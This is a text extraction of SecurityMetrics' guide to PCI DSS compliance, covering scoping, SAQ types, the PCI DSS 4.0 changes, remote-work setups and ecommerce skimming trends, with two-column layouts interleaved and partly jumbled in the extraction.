PCI DSS Implementation Guide 1711199156
PCI DSS Implementation Guide 1711199156
SecurityMetrics Guide to
PCI DSS
Compliance
A Resource for Merchants and Service
Providers to Become Compliant
[ EIGHTH EDITION ]
i|
Looking for a
PCI compliance
solution?
SecurityMetrics
1275 West 1600 North
Orem, UT 84057
Or contact:
marketing@securitymetrics.com
2|
Contents
Requirement 8_____________________________________________78
INTRODUCTION____________________________4
Requirement 9_____________________________________________85
How to Read This Guide_____________________________________5
Requirement 10____________________________________________92
PCI DSS Compliance Overview_______________________________8
Requirement 11____________________________________________96
Top 10 Failing SAQ sections_________________________________10
Requirement 12____________________________________________106
Understanding Your PCI DSS Responsibility____________________12
Implementing a PCI Compliant Remote Workforce Setup________35 What To Include In An Incident Response Plan__________________119
Introduction
SECTION CONTENTS
How to Read This Guide ������������������������������� 5 PCI DSS Version 4.0 ��������������������������������� 24
PCI DSS Compliance Overview ������������������������� 8 Implementing a PCI Compliant Remote Workforce Setup �� 35
Top 10 Failing SAQ sections ��������������������������� 10 Forensic Perspective ��������������������������������� 37
Understanding Your PCI DSS Responsibility ������������� 12 Forensic Predictions ��������������������������������� 42
SAQ Overview ��������������������������������������� 16
4|
How to Read This Guide
Whether you’re a new employee with limited PCI knowledge or an
experienced system administrator, the purpose of our guide is to NOTE:
help you secure your business and become compliant with PCI DSS
requirements. We designed this document as a reference guide to The information described in this guide is presented
address the most challenging aspects of PCI DSS compliance. as a reference and is not intended to replace security
assessments, tests, and services performed by qualified
Depending on your background, job role, and your organization’s security professionals. Users are encouraged to consult
needs, some sections may be more useful than others. Rather with their companies’ IT professionals to determine their
than reading our guide cover to cover, we recommend using it as a needs to procure security services tailored to those needs.
resource for your PCI compliance efforts.
90.4%
of SecurityMetrics customers who started
their SAQ went on to complete it and achieve a
passing status in 2022.
5
How to Read This Guide
The Prioritized Approach is broken down into the following six Perimeter firewalls
milestones (based on high-level compliance and security goals):1
Personal firewalls
Requirement 3
4 Monitor and control access to your systems 57
Protect Stored Account Data
Requirement 4
6 Complete compliance efforts, and ensure 63 Secure Data Over Open
all controls are in place and Public Networks
Requirement 5
67
Protect Against Malicious Software
6|
MILESTONES MILESTONES
PAGE PCI DSS REQUIREMENTS PAGE PCI DSS REQUIREMENTS
1 2 3 4 5 6 1 2 3 4 5 6
Requirement 6 Requirement 10
92
70 Secure Systems and Log and Monitor Access
Software Development
System logs and alerting
Regularly update and patch systems
Establishing log management
Establish software development
processes Log management system rules
8|
REQUIREMENT 4 REQUIREMENT 7 REQUIREMENT 10
Protect Cardholder Data with Strong Restrict Access to System Log and Monitor All Access
Cryptography During Transmission Components and Cardholder to System Components and
Over Open, Public Networks Data by Business Need to Know Cardholder Data
• Know where data is transmitted • Restrict access to cardholder data • Implement logging and alerting
and received
• Document who has access to the • Establish log management
• Strongly encrypt all transmitted card data environment
• Create log management and
cardholder data
• Establish a role-based access monitoring system rules
• Stop using SSL and early TLS control system
1 3
We scanned our merchant database
SECURITY ANNUAL
in search of the top 10 areas where
SecurityMetrics merchant customers POLICY REVIEW
struggle to become compliant. Starting
with the least adopted requirement,
these are the results: Requirement 12.1 Requirement 12.1.1
2 BREACH
PLAN 4 REQUIREMENT
MANAGEMENT
Requirement 12.1.1
10 |
5 INCIDENT
RESPONSE 7 SERVICE
PROVIDERS 9 WRITTEN
AGREEMENTS
6 AWARENESS
PROGRAM 8 PERSONNEL
RESPONSIBILITIES 10 USAGE
POLICIES
Implement a formal security Ensure that the security Verify that the usage policies
awareness program to make policy and procedures clearly define all critical devices and
all personnel aware of the define information security personnel authorized to use
cardholder data security policy responsibilities for all personnel. the devices.
and procedures.
PCI DSS 4.0 introduced many new controls, but the basic definition
PCI DSS SCOPING AND NETWORK
of what is in-scope has not changed. PCI scope deals with the
people, processes, and technologies that must be tested and SEGMENTATION SUPPLEMENT
protected to become PCI compliant. An SAQ is simply a validation
tool for merchants and service providers to self-evaluate their PCI In May 2017, the PCI Security Standards Council (SSC) released
DSS compliance. a supplemental guide for scoping and network segmentation.2
The purpose of this guidance was to help organizations identify
If the people, process, or technology component stores, processes, the systems that need to be considered in scope for PCI DSS
or transmits cardholder data, is connected to systems that do, or compliance and clarify how segmentation can reduce the number
could impact the security of the cardholder data environment, it’s of in-scope systems.
considered in scope for PCI compliance. This means that PCI re-
quirements apply and the system components must be protected. You need to understand your business environment—especially what
systems are included and how those systems interact with sensitive
System components most likely in scope for your environment data. You are then required to apply PCI DSS security requirements
may include: to all system components included in, connected to, or could impact
the security of the cardholder data environment (CDE), which is
• Networking devices “comprised of they system components, people, and processes that
• Servers store, process, or transmit CHD or sensitive authentication data.”3
• Switches
• Routers
• Computing devices
• Applications
12 |
SCOPE YOUR ENVIRONMENT
When scoping your environment, start with the assumption that Segmentation prevents out-of-scope systems from communicating
everything is in scope until it is verified that all necessary controls with systems in the CDE or from impacting the security of the CDE.
are in place and actually provide effective segmentation. An out-of-scope system is a system component that:
• Segment CDE systems from out-of-scope systems and • Physical access controls
networks (e.g., firewalls configured to block traffic from
• Logical access controls
untrusted networks)
• Multi-factor authentication
• Support PCI DSS requirements (e.g., time servers,
audit log storage servers) • Restricting administrative access
MATT HALBLEIB
SecurityMetrics Audit Director
CISSP | CISA | QSA (P2PE) | PA-QSA (P2PE)
To discover your PCI scope and what must be included for your
Simple questions can help you begin the scoping process.
PCI compliance, you need to identify anything that processes,
For example, ask yourself:
stores, or transmits cardholder data, and then evaluate what
people and systems are communicating with your systems. In • How do you collect money?
May 2017, the PCI Council released an informational supplement
• Why do you handle card data?
regarding PCI scoping.2 The document helps reinforce and clarify
scoping points that have always been part of PCI scoping. The • How do you store, process, and transmit this data?
document can help you work through your annual scoping
exercise and can lead you to discover card flows and in-scope
systems that you may have previously ignored. There are always processes you might not realize are in scope. For
example, if you are a retail store that swipes cards, do you ever take
In my experience performing PCI audits, entities often overlook the card numbers over the phone or receive emails with card information?
ancillary or support types of systems when doing their own PCI Are any paper orders received? Organizations often have finance,
scoping. For instance, call centers usually pay little attention to treasury, or risk groups that have post-transaction processes involving
QA systems, which often store cardholder data in the form of call cardholder data. It is important to include these processes when
recordings. These systems are in scope for all PCI requirements! determining scope.
14 |
Don’t forget power outage procedures where card data is Usually, organizations can find ways to fix processes and delete this
sometimes taken down manually. For example, in most call centers, sensitive data, rather than add servers to their scope. A simple way to
we’ve discovered that agents are typically unaware that card data find unencrypted card data is by running a card discovery tool, such as
should never be written down. But when the application they use for SecurityMetrics PANscan®. Organizations need to have methods to
recording cardholder data freezes, they tend to resort to typing or detect these mistakes and prevent or delete them. Some use a data
writing it down in a temporary location and retrieving it later for entry. loss prevention (DLP) solution to help them with this process.
These temporary locations are rarely considered in an organization’s
PCI compliance efforts but can lead to increased risk and should be The next step in determining your PCI scope is to find everything that
included in your PCI scope. can communicate with the devices you have identified. This is often
the hardest part about scoping because you may not understand what
Paper trails of hand-written information or photocopied payment card can communicate to your systems. Answer the following questions:
data can sometimes fill multiple rooms. Even if card data is ten years
• How do you manage your systems?
old, it is still in PCI scope.
• How do you log in to them?
If you access a web page for data entry, there’s a decent chance card
• How do you backup your systems?
data can be found in temporary browser cache files. In addition, it’s
the website developer’s responsibility to make sure websites don’t • How do you connect to get reports?
generate cookies or temporary log files with sensitive data. However,
• How do you reset passwords?
you don’t always have full control of your website, which is why it’s
important to evaluate all systems for cardholder data, even where • How do you administer security controls on your systems?
you might not expect it to reside.
If you have a server that handles cardholder data, you must always
For organizations with web portals, if someone mistypes card data into consider what else communicates with that server. Do you have a
an address or phone number field, it is still considered in PCI scope. database server in some other zone you consider out of scope but
is reaching that web server to pull reports and save data? Anything
You might think your databases are set up to encrypt all cardholder that can initiate a connection to an in-scope server that handles
data. However, servers you consider out of scope will often hold cardholder data will be in scope for compliance.
temporary files, log files, or backups with lots of unencrypted data.
System administrator folders on file servers are also common In addition, if your system in the CDE initiates a communication out to
culprits, as they often backup failing servers in a rush to prevent a server in another zone, that server will also be in scope. There are
data loss without considering the PCI implications. very few exceptions to this.
• Fully outsourced card acceptance and processing • Internet-based stand-alone terminal isolated from other
devices on the network
• Merchant website provides an iframe or URL that redirects
a consumer to a third-party payment processor • Cellular phone (voice) or stand-alone terminal
3.2.1 191 Questions, Vuln. Scan 3.2.1 160 Questions, Vuln. Scan
A-EP C
4.0 151 Questions, Vuln. Scan 4.0 131 Questions, Vuln. Scan
3.2.1 41 Questions, No Scan • View or handle cardholder data via the Internet
B 4.0 27 Questions, No Scan
• POS with tokenization
16 |
3.2.1 83 Questions, No Scan 3.2.1 329* Questions, Vuln. Scan
C-VT D-Merchant
4.0 54 Questions, No Scan 4.0 251* Questions, Vuln. Scan
• One at a time via keyboard into a virtual terminal • Merchant website accepts payment and does not
use a direct post or transparent redirect service
• On an isolated network at one location
Electronic storage of card data
• No swipe device
• POS system not utilizing tokenization or P2PE
• Knuckle buster/imprint machine
• Merchant stores card data electronically
(e.g., email, e-fax, recorded calls, etc.)
• Validated PCI P2PE hardware payment • Handles card data on behalf of another business
terminal solution only
• Provides managed firewalls in another entity's cardholder
• Merchant specifies they qualify for the data environment
P2PE questionnaire
• Hosts a business's ecommerce environment/website or
controls the flow of ecommerce data.
18 |
SAQ A-EP
• Your company only accepts ecommerce transactions. Like most SAQ A merchants, SAQ A-EP merchants have an
ecommerce payment environment where the collection and
• All processing of cardholder data–with the exception of the
processing of cardholder data have been outsourced to PCI
payment page–is entirely outsourced to a PCI DSS validated
DSS-compliant service providers. Unlike the SAQ A, SAQ A-EP
third-party payment processor.
websites control the flow of cardholder data to the service
• Your ecommerce website does not receive cardholder provider (typically using javascript or direct post methods).
data but controls how consumers–or their cardholder
data–are redirected to a PCI DSS validated third-party If you have an ecommerce environment and you are not using
payment processor. a third-party iFrame or fully redirecting users to the service
provider’s website for payment collection but your website
• If the merchant website is hosted by a third-party provider, the
never receives cardholder data directly, the SAQ A-EP is likely
provider is validated to all applicable PCI DSS requirements
the correct choice for your compliance documentation.
(e.g., including PCI DSS Appendix A if the provider is a shared
hosting provider).
• Your company only uses an imprint machine and/or uses • Your business only uses standalone, PTS-approved Point of
only standalone, dial-out terminals (connected via a phone Interaction (POI) devices connected via IP to your payment
line to your processor) to take your customers’ payment processor to take your customers’ payment card data.
card information.
• Standalone IP-connected POI devices are validated to
• Standalone, dial-out terminals are not connected to any the PTS POI program as listed on the PCI SSC website
other systems within your environment. (excludes SCRs).
• Standalone, dial-out terminals are not connected to • Standalone IP-connected POI devices are not connected to
the Internet. any other systems within your environment.
• Your company does not transmit cardholder data over • The only transmission of cardholder data is from PTS-
a network (either an internal network or the Internet). approved POI devices to the payment processor.
• Any cardholder data your company retains is on paper • The POI device doesn’t rely on any other device (e.g., computer,
(e.g., printed reports, receipts), and these documents are mobile phone, tablet) to connect to the payment processor.
not received electronically.
• The business has only paper reports or paper copies of
• Your company does not store cardholder data in an receipts with cardholder data, and these documents are
electronic format. not received electronically.
Most SAQ B merchants receive cardholder data in person and via • Your company does not store cardholder data electronically.
mail-order/telephone-order transactions and process these payments
Most SAQ B-IP merchants receive cardholder data in person and
using bank-provided payment terminals that are connected to dial-up/
via mail-order/telephone-order transactions and process these
analog phone lines. Cardholder data should never be received elec-
payments using bank-provided terminals.
tronically (via email) or stored electronically. Be sure your terminals
are connected to analog lines and not connected to IP networks.
SAQ B-IP terminals are, however, connected to an IP network and
transmit their data over the network instead of an analog connection.
This allows for much faster processing times, but security controls
must be in place to properly segment and protect payment data being
transmitted over the network.
20 |
SAQ C SAQ C-VT
• Your business has a payment application system and an • Your company only processes payments through a virtual
Internet connection on the same device and/or same local payment terminal accessed by an Internet-connected web
area network (LAN). browser.
• The payment application system isn’t connected to any • Your company’s virtual payment terminal solution is
other systems within your environment. provided and hosted by a PCI DSS validated third-party
service provider.
• The POS environment isn’t connected to other locations,
and any LAN is for a single location only. • Your company accesses the PCI DSS-compliant virtual
payment terminal solution through a computer that is
• Any cardholder data your business retains is on paper (e.g.,
isolated in a single location and is not connected to other
printed reports, receipts), and these documents are not
locations or systems within your environment.
received electronically.
• Your company’s computer does not have software installed
• Your company does not store cardholder data in an
that causes cardholder data to be stored.
electronic format.
• Your company’s computer does not have any attached
Typical SAQ C merchants receive cardholder data in person and via
hardware devices that are used to capture or store
mail-order/telephone-order transactions that are processed using
cardholder data.
a Point-of-Sale system that is configured to not store the full PAN
(credit card number). Typical POS solutions will have multiple POS • Your company does not otherwise receive or transmit
workstations/registers connected to a back-end server (the server cardholder data electronically through any channels.
may be hosted by a vendor/third-party). The SAQ C is designed for a
• Any cardholder data your company retains is on paper,
simple, single-location POS deployment.
and these documents are not received electronically.
Merchants with multiple locations that are connected to the • Your company does not store cardholder data in an
corporate office should be using the SAQ D. electronic format.
• All payment processing is through a validated PCI P2PE SAQ D applies to merchants who don’t meet the criteria for any
solution approved and listed by the PCI SSC. other SAQ type. This SAQ type handles merchants who store card
information electronically and do not use a P2PE certified POS
• The only systems in the merchant environment that store,
system. Examples of SAQ D merchant types include:
process, or transmit account data are the Point of Interaction
(POI) devices, which are approved for use with the validated • ecommerce merchants who accept cardholder data on
and PCI-listed P2PE solution. their website.
• You do not otherwise receive or transmit cardholder • Merchants with electronic storage of cardholder data.
data electronically.
• Merchants that don’t store cardholder data electronically
• There’s no legacy storage of electronic cardholder data
• but that do not meet the criteria of another SAQ type.
in the environment.
• Merchants with environments that might meet the criteria
• If your business stores cardholder data, this data is only
of another SAQ type, but that have additional PCI DSS
in paper reports or copies of paper receipts and isn’t
requirements applicable to their environment.
received electronically.
22 |
COMBINING MULTIPLE SAQS PCI DATA SECURITY ESSENTIALS
EVALUATION TOOL FOR SMALL MERCHANTS
Some merchants will have multiple payment flows that together may
not fit any SAQ type besides the SAQ D. For instance, a merchant may
The PCI council released a payment security tool–the Data Security
have an outsourced ecommerce payment channel that would fit the
Essentials (DSE) Evaluation Tool–to simplify security evaluation and
SAQ A but may also accept card-present transactions using an ana-
increase security awareness for eligible small merchants. The Data
log-connected bank terminal (SAQ B).
Security Essentials Evaluation Tool includes 15 new categories from
the PCI Council–based on payment acceptance methods–which will
A merchant with multiple payment channels will likely be required
help smaller merchants simplify their compliance process and get
to complete the SAQ D as they would not be able to affirmative-
the most benefit from their efforts.
ly answer the qualifying criteria questions when looking at their
multiple payment channels together.
“Merchants are only eligible to use a Data Security Essentials
evaluation if they have been notified by their acquirer [aka their
Some merchant banks will allow a merchant to assess each payment
merchant bank] that it is appropriate for them to do so.”5
channel separately with the SAQ that matches each payment channel.
So, in the case of an SAQ A + SAQ B combo environment, the merchant
To find out more information about DSE evaluations and your
may be able to complete an SAQ A to cover their ecommerce channel
possible options, contact your merchant bank.
and an SAQ B to cover the card-present payment channel and provide
their bank with both SAQs.
24 |
THE GOAL OF PCI DSS 4.0 Evolution Area Comments
Why did the PCI Council make a major rewrite of the PCI DSS when Scoping Scoping guidance will be a more integral part of
it is considered to be a fairly mature standard? the standard itself by providing more detail on
requirements for scoping validation. New require-
ments include tasks for organizations to verify their
There are four major reasons for the changes: PCI DSS scope and some additional requirements
for service providers.
1. Ensure the standard continues to meet the security
needs of the payments industry
Included are continued enhancements to require-
Protection of
2. Promote security as a continuous process ments for the protection of cardholder data in
Cardholder Data
motion throughout the network.
3. Enhance validation methods and procedures Transmissions
26 |
CUSTOMIZED APPROACH Customized Approach Milestones:
PCI DSS 4.0 introduces the concept that not all security approaches The customized approach offers more validation flexibility, but
are the same and that there may be many ways to achieve a security it’s not ideal for everyone. The following figure illustrates where
objective. Version 4.0 will allow customization of requirements and responsibilities lie when using the customized approach:
testing procedures in order to accommodate this.
Many companies have security solutions in place that may meet the
THE ENTITY
intent of a security objective but not meet a specific requirement.
This approach could let entities show how their specific solution Implements control(s) that meets the
meets the intent of the security objective and addresses the risk, intent of the PCI DSS Requirement
and therefore provides an alternative way to meet the requirement.
Provides documentation that describes
This new approach will take the place of compensating controls in the the customized implementation
PCI DSS 4.0 standard. The PCI council has stated that “Unlike com-
pensating controls, customized validation will not require a business or • The who, what, where, when,
technical justification for meeting the requirements using alternative and how of the controls
methods, as the requirements will now be outcome-based.”7
• Evidence to prove the controls
meet the stated intent
While this new validation method may sound simple, it will most
likely result in more assessment work initially for the entity in order • Evidence of how controls
to prepare documentation and risk assessment data for a QSA to are maintained, and
evaluate. It will then require specialized testing procedures to be effectiveness is assured
developed by the QSA and agreed upon by the entity.
The customized approach will not be for everyone and will be THE ASSESSOR
most suited for entities with mature security and risk assessment
Plans and conducts the assessment
processes in place.
• Reviews information
The custom process provides the advantage of defining a more
provided by the entity
permanent solution for compliance validation of specialized security
controls. This is different from previous temporary compensating • Derives testing procedures
controls in earlier versions of the standard, where you had to document based on information provided
a justification for the control with a business or technical constraint.
• Documents details of testing
procedures and results of
testing in the ROC
28 |
CUSTOMIZED APPROACH
AND RISK ASSESSMENTS
As mentioned in the previous section, the Customized Approach is Now, the expectation is that if you make a change in your environ-
now available. However, before jumping right in, larger organiza- ment (e.g., adding a new firewall), you need to do a risk assessment
tions and risk assessment teams may want to look at the Defined on that change.
Approach and Customized Approach so that they understand the
differences between the two and can make the right decisions for If you don’t have a lot of experience with a formal risk assessment, or
their organization. don’t have a risk department as part of your company, you may need
initial help from a third party to get you going and learn how to do
A lot of people are excited about the Customized Approach because these things.
it sounds easier to get compliant. In reality, it’s going to be more
complicated than it sounds. The Customized Approach requires a Formal risk assessments may not seem like a big change based on
lot of work and effort to define what the actual requirements are some of the other future dated requirements that have been added to
and how to measure the requirements. the standard, but this change in PCI DSS 4.0 may result in additional
effort in the transition process.
One of the biggest adjustments to PCI 4.0 is the increased use of risk
assessments within the Customized and Defined Approaches. Risk
assessments for a Customized Approach are a big part of the new
standard. Instead of being a simple and quick process, organizations
will need to follow a very structured formalized risk assessment.
Requirement 1 3.4.2 (March 31, 2025) some effort so you may want to focus on this
earlier rather than later.
There were no significant changes. If you’re using remote access technology
to access the cardholder data environment 3.5.1.2 (March 31, 2025)
(CDE), then you must prevent the copy and
Requirement 2 relocation of primary account number (PAN) This requirement discusses the removal
data. This has been mentioned before, but of disk-level encryption as an option to
There were no significant changes. now it will be a requirement. protect card data. Now it can only be used
for removable media (e.g., a USB drive, an
`addressing this process, but now it needs external SSD). You can’t use it anymore
Requirement 3 to be enforced by some technology. There on your computer’s hard drive or any kind
may be settings in your remote access of non-removable media. If you’re using
3.2.1 (March 31, 2025) software that have ways of preventing disk-level encryption for protection, you will
access to certain functions. Depending on need to make some changes.
In the past, if you stored sensitive authen- what resources you have and your current
tication data before authorization, it was processes, this requirement may or may not
recommended that you should try to be difficult to implement. Requirement 4
encrypt or protect it, but it wasn’t required.
Now, it is required. 3.5.1.1 (March 31, 2025) 4.2.1 (March 31, 2025)
3.3.3 (March 31, 2025) PCI DSS 4.0 also changes the security required A new requirement in this section will be
on hashing functionality if your system is using to carefully document, track, and inventory
Issuers now must encrypt the sensitive a hash method for protecting card data. SSL and TLS certificates in use for the
authentication data that they may be storing. transmission of sensitive data across public
This may not be a big deal for most issuers Organizations will need to use a keyed cryp- networks. Increased tracking will help
at this point, but it may be difficult for some tographic hash method, which is different from ensure the certificates’ continued strength
legacy systems where encryption software most common hash algorithms in use. So you and validity. So, it’s just a new process and
is not readily available. may need to change your hashing algorithm to tracking that needs to be implemented.
something like HMAC, CMAC, or GMAC, with
an effective cryptographic strength of at least
128-bits. A code change of this kind could take
30 |
Requirement 5 Requirement 6 Requirement 7
5.3.3 (March 31, 2025) 6.4.2 (March 31, 2025) 7.2.4, 7.2.5, 7.2.5.1 (March 31, 2025)
Not much has changed in this section.
Organizations will need to scan removable In PCI DSS 3.2.1, a web application It’s the basic, role-based access control
media used in the CDE. Since most antivirus firewall or a process to do code reviews requirements, and most of the changes
solutions do this or have the capability, it was required to protect web applications are just tightening account reviews and
may just require some configuration setting developed by a company. In March 2025, processes around reviews for systems,
changes. Review the capabilities of the organizations will need to have a web users, and applications.
malware solution you are using to see if they application firewall in place for any web
have these capabilities. applications exposed to the Internet.
Requirement 8
5.4.1 (March 31, 2025) This standard has been a long time coming
and shouldn’t be surprising. There are many 8.3.6 (March 31, 2025)
One of the bigger changes is that a solutions, including cloud-based solutions,
requirement to have automatic process that can help with this requirement. To strengthen passwords, the minimum
mechanisms in place to detect and protect length of passwords is moving from 7 to 12
personnel against email phishing attacks 6.4.3 (March 31, 2025) alpha and numeric characters.
has been added.
To reduce the possibility of malicious scripts Depending on your applications, this could
If you’re doing your email in house, you making it onto payment pages, organizations be a simple fix or it may require some code
may or may not have had all the controls need an inventory of all the known scripts changes. So, start checking now to see if
in place for this yet. If you’ve outsourced used on those pages. there are any systems in use in your CDE
emails, confirm with your provider and see that would have difficulty with this future
what sort of protections they have against This inventory must be documented and dated requirement.
phishing attacks. tracked to ensure that all the scripts used
are authorized, and that the integrity has 8.3.10.1 (March 31, 2025)
been validated. Review the guidance column
for further information on this requirement. Another change in section eight around
passwords pertains to service providers.
Customers of service providers will now
have to change their passwords every 90
days if you’re using just a password for
authentication (i.e., you are not using a
multi-factor authentication).
Multi-factor authentication will be required There were no significant changes. 11.3.1.2 (March 31, 2025)
for all access to the CDE, not just from
external locations. So this would apply to Internal vulnerability scanning must now be
internal administrative access to servers, Requirement 10 authenticated. This means that it’s not just a
firewalls, networking gear, etc. scan of ports and services; now, if a service
10.4.1.1 (March 31, 2025) is exposed that requires a credential to
8.5.1 (March 31, 2025) access it (e.g., a web app), you need to use
Organizations can no longer review their those credentials to gain access and test
PCI DSS 4.0 adds a new detail to MFA logs manually. the authenticated port or service.
requirements that might be a bit tricky.
Success of all the factors has to happen Few, if any, companies are manually An important part of this new requirement
before authentication, and it can’t be known reviewing logs anymore as it’s just too will be that the credentials used by the vul-
from the process which factor has failed. much data to effectively review manually. nerability assessment (VA) scanner must be
There are many log review tools out there entered into the system and stored securely.
Presently, most systems ask for a username so it shouldn’t be difficult to implement a This will have to be a feature of the VA
and password (i.e., something you know) solution. Manual review of logs is time-con- scanning solution and should be something
and only move on to the second factor if you suming and easy to do poorly, so this is a you check with your vendor carefully on.
have the correct username/password. This good change.
will no longer be allowed. 11.5.1.1 (March 31, 2025)
10.7.2 (March 31, 2025)
Both factors will have to be presented and Another requirement change was on IDS/
entered without revealing any information All organizations must now detect, alert, IPS, so that systems detect and alert on any
about which factor might have been wrong if and promptly address failures of critical covert malware communication channels
authentication fails. security control systems. This used to be that are being used (i.e., DNS tunneling).
only required for service providers, but has This may represent a change to the IDS/IPS
8.6.2 (March 31, 2025) now been extended to everyone. system that you are currently using.
All application and system passwords that This means that if you had a firewall or IDS 11.6.1 (March 31, 2025)
could be used for interactive login have system that went down for some reason,
additional approval and tracking controls you would have to detect it, generate an One of the biggest things in section eleven was
on their use, and can no longer reside in a alert, and respond to that alert. This update the addition of a requirement to implement a
script or a file. will require additional procedures for change and tamper detection mechanism for
merchants to implement. We recommend any payment pages. This requirement addition
that you start now to look for solutions. is a direct result of the increase in ecommerce
skimming compromises seen on payment
pages in recent years.
32 |
Before March 31, 2025, companies will have 12.6.2 (March 31, 2025) 12.10.7 (March 31, 2025)
to deploy a solution that will detect changes
to those pages (e.g., script additions, changes Organizations will need to enforce a more Incident response procedures will need
to known script and code). formal Security Awareness Program, where to be initiated if stored primary account
before you could get by with some basic numbers (PAN) is detected anywhere it
security training. is not expected. This means that you are
This is a great addition to the always on the watch for new or errant
standard and is absolutely Organizations will need to document and processes creating repositories of stored
needed for ecommerce websites. update their Security Awareness Program at PAN outside of expected boundaries.
least once every 12 months and as needed to
address any new threats and vulnerabilities Periodic review of processes dealing with
that may impact the security of their CDE or card data and running a good data discovery
Requirement 12 information provided to personnel about their tool will be needed to fully say you have
role in protecting cardholder data. satisfied this future dated requirement.
12.5.2
(Immediately Effective for 4.0 Assessments) 12.6.3.1 (March 31, 2025)
An annual scoping of your card data The standard now expects a security training
environment was mentioned in the initial program to discuss specific threats and vul-
discussion section of previous versions nerabilities in your environment, as well as
of PCI DSS, but now the Council has acceptable use of end-user technologies.
moved that into the requirements matrix
under section 12 and made it a trackable For example, if phishing is a big deal for
requirement effective immediately for your environment, then you need to address
version 4.0. phishing in your training. The training
program will also need to be reviewed and
So a documented scoping exercise will updated at least annually.
have to be done by merchants annually,
or after any significant changes to the
in-scope environment (e.g., people,
systems, processes).
TAKEAWAYS
First, read the PCI DSS version 4.0 standard and get familiar with PCI DSS 4.0 SUMMARY
the bigger changes that could impact your compliance process.
As a reminder, PCI DSS version 4.0 may seem daunting, but it is
Then start formulating your plans right now to implement changes
actually an improved way to counteract the techniques used by
for version 4.0. There is plenty of time, so start early and you will
threat actors. Preparing for compliance to version 4.0 is straight-
not have problems making the transition. During this planning
forward if you are already working towards or maintaining
process don’t forget to keep working hard to keep your current
compliance to PCI DSS 3.2.1.
efforts going to be compliant to PCI DSS version 3.2.1.
Second, start thinking about how you are conducting your risk
assessments. More formal risk assessment processes are required
in version 4.0 and most organizations will have to add processes
and gain skills to do this correctly. Start researching formal risk
assessments and refer to the industry standards out there like NIST
800-30 and OCTAVE to begin getting familiar with them. It may be a
good idea to consult with a QSA as you develop these processes.
Finally, don’t wait until 2024 to begin switching over to PCI DSS 4.0.
Spread your efforts across the next couple of years and you will be
just fine with the new requirements.
34 |
Implementing a
PCI Compliant Remote
Workforce Setup
It is increasingly common for companies to allow employees to work
from home. It is important to remember that if cardholder data is
processed, transmitted, or stored by employees working from home,
their home environment will be part of the organization’s PCI scope.
Guide
Guideto
toPCI
PCIDSS
DSS Compliance
Compliance || Introduction
Introduction | 35
Implementing a PCI Compliant Remote Workforce Setup
THE SCOPE OF THE REMOTE WORK CDE EXTENDING THE EXISTING CDE
When scoping a work-from-home implementation where employees Many organizations will already have an existing CDE with mature
will be collecting or processing cardholder data, begin by mapping controls designed to protect customer data. When implementing
out the flow of cardholder data. a work-from-home scenario, attempt to leverage the tools and
security controls that exist in the corporate environment.
Questions to answer: Assume that the employee’s home network and computer are not
a secure option for processing payments. You can maintain the
• How is data being received by the employees (e.g.,
security stance of your CDE by extending your CDE network via VPN
over the phone, fax, Internet communications)?
connectivity and providing company-owned mobile devices that have
• Once this data is received, how are employees been hardened and can be managed remotely. Also, keep in mind
processing the data? that split tunneling should be disabled in order to maintain proper
network segmentation.
• What devices and network segments are involved in
the transmission of cardholder data?
Most enterprise phone deployments have moved to Voice over IP
• Is cardholder data being stored electronically or (VoIP). VoIP offers great flexibility that can also be leveraged in a work-
on paper? from-home scenario. If your CDE includes telephone-order options,
send VoIP endpoints home with your employees that will extend your
• What type of voice communication channels
VoIP system over an encrypted connection (such as a VPN).
are involved?
• If cardholder data is received over the phone, are calls For more information on protecting voice communications, see
being recorded? the PCI SSC’s guidance on Protecting Telephone-based
Payment Card Data.8
36 |
Forensic Perspective
INTRODUCTION
ECOMMERCE
SECURITY TRENDS
Findings From Securitymetrics’
Ecommerce Security Service
68.3%
of discovered issues
were suspicous.
68.3%
38 |
92.4 %
92.4% of Shopping Cart Inspect reviews identified
malicious, suspicious, and/or concerning issues on
researched ecommerce sites.
2. Malicious Post
A script is running with a post of data to a known bad site.
3. Malicious Javascript
Javascript appears to be acting in a malicious manner, such as
harvesting credit cards or other sensitive data.
4. Form Jacking
Authorized payment webform is being replaced by a counterfeit.
1. Javascript issue
Out-of-date JavaScripts can lead to vulnerabilities available for
future malicious attacks.
2. Ads/Business Intelligence
Advertising/Analytics content is being pulled into the pages being
reviewed in the checkout environment. This can be a source of
intermittent card/data loss due to drive-by malvertising.
4. Configuration Issue
Missing required web server security headers.
40 |
Detect eskimming
LEARN MORE
on your website.
1. Configuration Vulnerability
A configuration item with a website or web server is not following
best security practices.
3. Mixed HTTP/HTTPS
Content called via HTTP in an HTTPS environment, breaking strict
SSL/TLS protocol. In severe cases, this can be exploited by bad
actors to view privileged content.
5. SPAM Watch
A domain has been flagged by the SPAM community, which could
be using the email server to transmit malicious communications
by bad actors.
41
Forensic Predictions
PREDICTION 1
INCREASED PHISHING SOPHISTICATION Another trend that’s increased is SMS phishing or smishing. This
is where your text messages are being used against you, with
Last year, a major company was breached about every week, let
attackers trying to get access to automatic two-factor authentica-
alone the numerous cases of small businesses falling for phishing.
tion codes that come up in text messages. But if your phone has
Some of these breaches even came from teenagers tricking these
been compromised via one of these previous methods, attackers
large organizations by utilizing sophisticated phishing attacks.
will be able to access the code before you do.
For example, one recent phishing example we’ve seen become more
relevant is phishing emails sending requests through electronic
signature tools. Once you click on what you believe is a form to fill
out or sign, you are taken to a blank image. That blank image has
malware embedded into it, enabling malicious attackers to gain
control of the network.
42 |
PREDICTION 2 PREDICTION 3
You also have incoming messages being displayed regardless of the Beyond backdoor vulnerabilities and active former DevOps accounts
content on the mobile phones. and credentials, third parties or contractors open up security vul-
nerabilities to organizations. For example, impersonation attacks
You need to focus on cybersecurity due diligence and your user that compromise dev tools and code libraries will continue to be a
security awareness because even with all the technical controls huge security issue, such as with clipper malware, which hijacks a
in place, these phones can be an easy gateway into your business user’s clipboard data.
security. Previously, these mobile browsers were put in a sandbox,
with it being difficult for third party coding to be injected into these
sandboxed apps.
But now with web view, these attackers will continue to target the
web view browser.
We recommend that if you don’t need an app on your phone, get rid of it.
If you do keep an app on your phone, you need to update it regularly.
44 |
Requirement 1
1
PERIMETER FIREWALLS
A properly configured business-grade perimeter firewall acts as the PERIMETER FIREWALL PROS
first line of defense and blocks unwanted network access. While
these are often physical devices, they can be offered as services in • Most robust security option
cloud environments, where they are often referred to as network
• Protects an entire network
security groups.
• Can segment internal parts of a network
A firewall is typically installed at the perimeter of an organization’s
network to protect internal networks from untrusted networks,
such as the Internet, often by restricting the types of network traffic PERIMETER FIREWALL CONS
permitted into the organization’s network and the locations from
• Rules need to be carefully documented
where the traffic originates. Perimeter firewalls can also be used
